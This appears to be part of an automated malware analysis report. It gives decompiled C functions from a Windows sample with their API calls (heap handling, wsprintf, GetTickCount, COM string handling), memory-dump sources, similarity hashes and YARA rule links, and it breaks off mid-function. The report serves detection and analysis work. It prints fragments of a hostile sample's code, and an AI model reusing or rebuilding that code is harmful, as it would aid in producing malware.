                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2204710431-1686923651
                                                                                                                                  • Opcode ID: 9d4bcbeb06d206b8713bd4c3b54ca893d0ddde55cad070fc19330a0dd95971b4
                                                                                                                                  • Instruction ID: 5432ddae9369842a7e26f9663d4ef6ea3061af4ab918a544d97c6a3d04249322
                                                                                                                                  • Opcode Fuzzy Hash: 9d4bcbeb06d206b8713bd4c3b54ca893d0ddde55cad070fc19330a0dd95971b4
                                                                                                                                  • Instruction Fuzzy Hash: 72217FB1904A96AFDB21CFB8849076BBEECAF18254F044E1EE459C7A41E734D602CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A34B98, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E00A34B98() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xa3d364; // 0x33a95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xa3d364; // 0x33a95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xa3d364; // 0x33a95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xa3e823) {
					HeapFree( *0xa3d270, 0, _t10);
					_t7 =  *0xa3d364; // 0x33a95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                                                                                                  0x00a34b98
                                                                                                                                  0x00a34ba1
                                                                                                                                  0x00a34bb1
                                                                                                                                  0x00a34bb1
                                                                                                                                  0x00a34bb6
                                                                                                                                  0x00a34bbb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34bab
                                                                                                                                  0x00a34bab
                                                                                                                                  0x00a34bbd
                                                                                                                                  0x00a34bc2
                                                                                                                                  0x00a34bc6
                                                                                                                                  0x00a34bd9
                                                                                                                                  0x00a34bdf
                                                                                                                                  0x00a34bdf
                                                                                                                                  0x00a34be8
                                                                                                                                  0x00a34bea
                                                                                                                                  0x00a34bee
                                                                                                                                  0x00a34bf4

                                                                                                                                  APIs
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(033A9570), ref: 00A34BA1
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00A35390), ref: 00A34BAB
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,00A35390), ref: 00A34BD9
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(033A9570), ref: 00A34BEE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 58946197-8415677
                                                                                                                                  • Opcode ID: 53ded4aa1fed252d69b984c084318532386a27d9f443d7aef74421f8eddb8432
                                                                                                                                  • Instruction ID: 5b263adde730f369479904bcd63690b5ddcdadd29220cee1fc06235e9a87dc69
                                                                                                                                  • Opcode Fuzzy Hash: 53ded4aa1fed252d69b984c084318532386a27d9f443d7aef74421f8eddb8432
                                                                                                                                  • Instruction Fuzzy Hash: AFF0B2B8A04340DBEB18CFE4FE99F1577A4AB4A310B044019B502DB260C720EC429A11
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E932B27, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                  • Opcode ID: bcbe779c31157eed50c4d06ee93e4cef3150bdbee6bcf5f37e242bf07f2cb4fb
                                                                                                                                  • Instruction ID: 82f023b999c3dbb32c2ab1f495dcb7a8f1f98f948c5c582d9c68e0e3c7da7879
                                                                                                                                  • Opcode Fuzzy Hash: bcbe779c31157eed50c4d06ee93e4cef3150bdbee6bcf5f37e242bf07f2cb4fb
                                                                                                                                  • Instruction Fuzzy Hash: C951E532A00715AFEB10DFAAC880AAA77F8FF59714F244969E815DB250E731D901CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FE244, Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404127365-0
                                                                                                                                  • Opcode ID: 553052bb9a527c4a483356c8188f8bd8eb366442fb42275b7b9b83cdb0162acf
                                                                                                                                  • Instruction ID: 9d9f6c3f39ee678dd2dadd4c07138d11817211271ce1b65009b54289335904b0
                                                                                                                                  • Opcode Fuzzy Hash: 553052bb9a527c4a483356c8188f8bd8eb366442fb42275b7b9b83cdb0162acf
                                                                                                                                  • Instruction Fuzzy Hash: BE2125B1C00348EFDB14DFE5D8849DABBB8AF84714F00895AE9159F255EB70DA41CFA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F67FA, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$Maklocchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2020259771-0
                                                                                                                                  • Opcode ID: 2833313188859c668e58f4cf59359ed7e4d85d9231e0e25294733c2f7c2fcab2
                                                                                                                                  • Instruction ID: 877c5e5175563c59976a1fc4e5f63ef5d0250026fd5787aa7b6c7256552b63e9
                                                                                                                                  • Opcode Fuzzy Hash: 2833313188859c668e58f4cf59359ed7e4d85d9231e0e25294733c2f7c2fcab2
                                                                                                                                  • Instruction Fuzzy Hash: CB116DB1960745FFE6208BE99840B52B7ECAF04694F048E2AF2448B640D365F95197E4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93CEE5, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6E93CEFD
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93CF0F
                                                                                                                                  • _free.LIBCMT ref: 6E93CF21
                                                                                                                                  • _free.LIBCMT ref: 6E93CF33
                                                                                                                                  • _free.LIBCMT ref: 6E93CF45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 18da560f28fd09a14ca3f854e1c34fd2ec7704841c61a228db5dd80ea5b4ff81
                                                                                                                                  • Instruction ID: 6317e2dcd4c17c898ec34a8ae09e7dc21c832c8673b0bc5dcaf0d10dc1b83b76
                                                                                                                                  • Opcode Fuzzy Hash: 18da560f28fd09a14ca3f854e1c34fd2ec7704841c61a228db5dd80ea5b4ff81
                                                                                                                                  • Instruction Fuzzy Hash: CDF06D35509E34ABCA40DBDAE488DDB37EDAF42614BB84C05F018DB601CB30F8C48EA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8E6020, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Smanip$task
                                                                                                                                  • String ID: .
                                                                                                                                  • API String ID: 1925983085-248832578
                                                                                                                                  • Opcode ID: a65e16cce39e5dae10fafb00ba16f26399d7800388a94bfdd3592628b3517f70
                                                                                                                                  • Instruction ID: 11973df3d927521aebf228c1b77d65fb753f2ca8bfa0d7065b47be3915b1b248
                                                                                                                                  • Opcode Fuzzy Hash: a65e16cce39e5dae10fafb00ba16f26399d7800388a94bfdd3592628b3517f70
                                                                                                                                  • Instruction Fuzzy Hash: FF8139B1904628DFCF08CF98CA90EEA77B5FF57304F108959D206A7684D7B4AA4CDB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3577D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                  			E00A3577D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0xa3d380; // 0x33a9b28
				_push(0x800);
				_push(0);
				_push( *0xa3d270);
				if( *0xa3d284 >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0xa3d284 =  *0xa3d284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00A3789B(_t44, _t40);
						_t18 = E00A33720(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0xa3d284 < 5) {
								 *0xa3d284 =  *0xa3d284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E00A347D5();
						HeapFree( *0xa3d270, 0, _t40);
						goto L10;
					}
					_t24 = E00A344A4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E00A36109(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}











                                                                                                                                  0x00a3577d
                                                                                                                                  0x00a3577d
                                                                                                                                  0x00a35780
                                                                                                                                  0x00a35781
                                                                                                                                  0x00a3578b
                                                                                                                                  0x00a35792
                                                                                                                                  0x00a35797
                                                                                                                                  0x00a35799
                                                                                                                                  0x00a3579f
                                                                                                                                  0x00a357c7
                                                                                                                                  0x00a357df
                                                                                                                                  0x00a357e1
                                                                                                                                  0x00a357e2
                                                                                                                                  0x00a357e4
                                                                                                                                  0x00a35822
                                                                                                                                  0x00a35822
                                                                                                                                  0x00a35828
                                                                                                                                  0x00a3582e
                                                                                                                                  0x00a3582e
                                                                                                                                  0x00a357e6
                                                                                                                                  0x00a357ec
                                                                                                                                  0x00a357ef
                                                                                                                                  0x00a357fe
                                                                                                                                  0x00a35800
                                                                                                                                  0x00a35807
                                                                                                                                  0x00a3583b
                                                                                                                                  0x00a35840
                                                                                                                                  0x00a35842
                                                                                                                                  0x00a35844
                                                                                                                                  0x00a35844
                                                                                                                                  0x00000000
                                                                                                                                  0x00a35842
                                                                                                                                  0x00a35809
                                                                                                                                  0x00a3580e
                                                                                                                                  0x00a3581c
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3581c
                                                                                                                                  0x00a357d6
                                                                                                                                  0x00a357db
                                                                                                                                  0x00a357db
                                                                                                                                  0x00000000
                                                                                                                                  0x00a357db
                                                                                                                                  0x00a357a9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a357b8
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 00A357A1
                                                                                                                                    • Part of subcall function 00A36109: GetTickCount.KERNEL32 ref: 00A3611D
                                                                                                                                    • Part of subcall function 00A36109: wsprintfA.USER32 ref: 00A3616D
                                                                                                                                    • Part of subcall function 00A36109: wsprintfA.USER32 ref: 00A3618A
                                                                                                                                    • Part of subcall function 00A36109: wsprintfA.USER32 ref: 00A361B6
                                                                                                                                    • Part of subcall function 00A36109: HeapFree.KERNEL32(00000000,?), ref: 00A361C8
                                                                                                                                    • Part of subcall function 00A36109: wsprintfA.USER32 ref: 00A361E9
                                                                                                                                    • Part of subcall function 00A36109: HeapFree.KERNEL32(00000000,?), ref: 00A361F9
                                                                                                                                    • Part of subcall function 00A36109: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A36227
                                                                                                                                    • Part of subcall function 00A36109: GetTickCount.KERNEL32 ref: 00A36238
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 00A357BF
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000002,00A3553A,?,00A3553A,00000002,?,?,00A353C9,?), ref: 00A3581C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 1676223858-8415677
                                                                                                                                  • Opcode ID: 427e8e8ecdb4b284fe62bb7573c1b1988bbdbe77d80ed236d0751960be654303
                                                                                                                                  • Instruction ID: 5bf2202d1c7a90bbe2cd38db8cdab5ef203744543f6e71a1acdd7a500b76ca66
                                                                                                                                  • Opcode Fuzzy Hash: 427e8e8ecdb4b284fe62bb7573c1b1988bbdbe77d80ed236d0751960be654303
                                                                                                                                  • Instruction Fuzzy Hash: A2214CB6600605EBCB11DFA8ED84EDA37BCEB49350F100426F902A7251DB70E906DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FDF66, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8FDF6D
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F681A
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6837
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6854
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6866
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6879
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FDFFA
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FE014
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2939335142-1686923651
                                                                                                                                  • Opcode ID: d8f207b87671f4ab34ced7d3884fa331846cc4aed6e80496cf74008402f66db6
                                                                                                                                  • Instruction ID: 6dcc549fe59e99c9fe3fc5f3eba8f0bf9d81947785cd0296121c9bca1ad7a167
                                                                                                                                  • Opcode Fuzzy Hash: d8f207b87671f4ab34ced7d3884fa331846cc4aed6e80496cf74008402f66db6
                                                                                                                                  • Instruction Fuzzy Hash: E02171B1904B56AFD721CFB98450B7BBAECAF18258B040E1EA459C7A41D774D602CFD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E906B83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 4281374311-1686923651
                                                                                                                                  • Opcode ID: 96edfc0e45770f848c7d35f814d305d90dc15db41d8a1ded508af638e9c91fd9
                                                                                                                                  • Instruction ID: 3e96006575a0a05f8f3ff08aa6ed7046c1720db0e26f2fecf60b3499a05e8932
                                                                                                                                  • Opcode Fuzzy Hash: 96edfc0e45770f848c7d35f814d305d90dc15db41d8a1ded508af638e9c91fd9
                                                                                                                                  • Instruction Fuzzy Hash: 992183B1904B56AFD761CFB9845077BBEECAF18244F440A1EE499C7A41E734D642CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A33273, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00A332AE
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A33393
                                                                                                                                    • Part of subcall function 00A35920: SysAllocString.OLEAUT32(00A3C2B0), ref: 00A35970
                                                                                                                                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 00A333E6
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A333F5
                                                                                                                                    • Part of subcall function 00A33D39: Sleep.KERNEL32(000001F4), ref: 00A33D81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3193056040-0
                                                                                                                                  • Opcode ID: b534873056b775fe0632f3cfe1563c3697e4e272899e8847188d1025ab5b37a5
                                                                                                                                  • Instruction ID: 24a29bdb98cad0e9524460c7d6730b0e230f317a996be51297770b69219b4af4
                                                                                                                                  • Opcode Fuzzy Hash: b534873056b775fe0632f3cfe1563c3697e4e272899e8847188d1025ab5b37a5
                                                                                                                                  • Instruction Fuzzy Hash: 90512C76604609EFDB01CFA8D844ADEB7B5BF88750F148869F505DB260DB71EE06CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A35920, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                  			E00A35920(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0xa3d2e0; // 0x296a5a8
					_t5 = _t103 + 0xa3e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0xa3c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0xa3d2e0; // 0x296a5a8
												_t28 = _t109 + 0xa3e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0xa3d2e0; // 0x296a5a8
														_t33 = _t79 + 0xa3e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                                                                                                  0x00a35925
                                                                                                                                  0x00a3592e
                                                                                                                                  0x00a3592f
                                                                                                                                  0x00a35933
                                                                                                                                  0x00a35939
                                                                                                                                  0x00a3593f
                                                                                                                                  0x00a35948
                                                                                                                                  0x00a3594e
                                                                                                                                  0x00a35958
                                                                                                                                  0x00a3595a
                                                                                                                                  0x00a35960
                                                                                                                                  0x00a35965
                                                                                                                                  0x00a35970
                                                                                                                                  0x00a35976
                                                                                                                                  0x00a3597b
                                                                                                                                  0x00a35a9d
                                                                                                                                  0x00a35981
                                                                                                                                  0x00a35981
                                                                                                                                  0x00a3598e
                                                                                                                                  0x00a35994
                                                                                                                                  0x00a3599a
                                                                                                                                  0x00a3599e
                                                                                                                                  0x00a359a4
                                                                                                                                  0x00a359b1
                                                                                                                                  0x00a359b5
                                                                                                                                  0x00a359bb
                                                                                                                                  0x00a359be
                                                                                                                                  0x00a359c6
                                                                                                                                  0x00a359c7
                                                                                                                                  0x00a359cb
                                                                                                                                  0x00a359cf
                                                                                                                                  0x00a359d2
                                                                                                                                  0x00a359d5
                                                                                                                                  0x00a359db
                                                                                                                                  0x00a359e4
                                                                                                                                  0x00a359ea
                                                                                                                                  0x00a359eb
                                                                                                                                  0x00a359ee
                                                                                                                                  0x00a359ef
                                                                                                                                  0x00a359f0
                                                                                                                                  0x00a359f8
                                                                                                                                  0x00a359f9
                                                                                                                                  0x00a359fa
                                                                                                                                  0x00a359fc
                                                                                                                                  0x00a35a00
                                                                                                                                  0x00a35a04
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a35a0a
                                                                                                                                  0x00a35a13
                                                                                                                                  0x00a35a19
                                                                                                                                  0x00a35a23
                                                                                                                                  0x00a35a27
                                                                                                                                  0x00a35a29
                                                                                                                                  0x00a35a36
                                                                                                                                  0x00a35a3a
                                                                                                                                  0x00a35a42
                                                                                                                                  0x00a35a47
                                                                                                                                  0x00a35a59
                                                                                                                                  0x00a35a5b
                                                                                                                                  0x00a35a61
                                                                                                                                  0x00a35a61
                                                                                                                                  0x00a35a6a
                                                                                                                                  0x00a35a6a
                                                                                                                                  0x00a35a6c
                                                                                                                                  0x00a35a72
                                                                                                                                  0x00a35a72
                                                                                                                                  0x00a35a75
                                                                                                                                  0x00a35a7b
                                                                                                                                  0x00a35a7e
                                                                                                                                  0x00a35a87
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a35a87
                                                                                                                                  0x00a359db
                                                                                                                                  0x00a359d5
                                                                                                                                  0x00a359be
                                                                                                                                  0x00a35a8d
                                                                                                                                  0x00a35a8d
                                                                                                                                  0x00a35a93
                                                                                                                                  0x00a35a93
                                                                                                                                  0x00a35a99
                                                                                                                                  0x00a35a99
                                                                                                                                  0x00a35aa2
                                                                                                                                  0x00a35aa8
                                                                                                                                  0x00a35aa8
                                                                                                                                  0x00a35965
                                                                                                                                  0x00a35ab1

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(00A3C2B0), ref: 00A35970
                                                                                                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00A35A51
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A35A6A
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00A35A99
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloclstrcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1885612795-0
                                                                                                                                  • Opcode ID: f46e7efb683ebaf59c7362df591f1fcd7c6392bbbf99e675133834d8b99780d5
                                                                                                                                  • Instruction ID: 81bd079b08e3522d58c2c54706446da544b2386a682490fba8494c7d640e3642
                                                                                                                                  • Opcode Fuzzy Hash: f46e7efb683ebaf59c7362df591f1fcd7c6392bbbf99e675133834d8b99780d5
                                                                                                                                  • Instruction Fuzzy Hash: F3513C76D00519EFCB04DFE8C9889AEB7B9FF89744B148694F915EB210D731AD42CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A37B30, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                  			E00A37B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
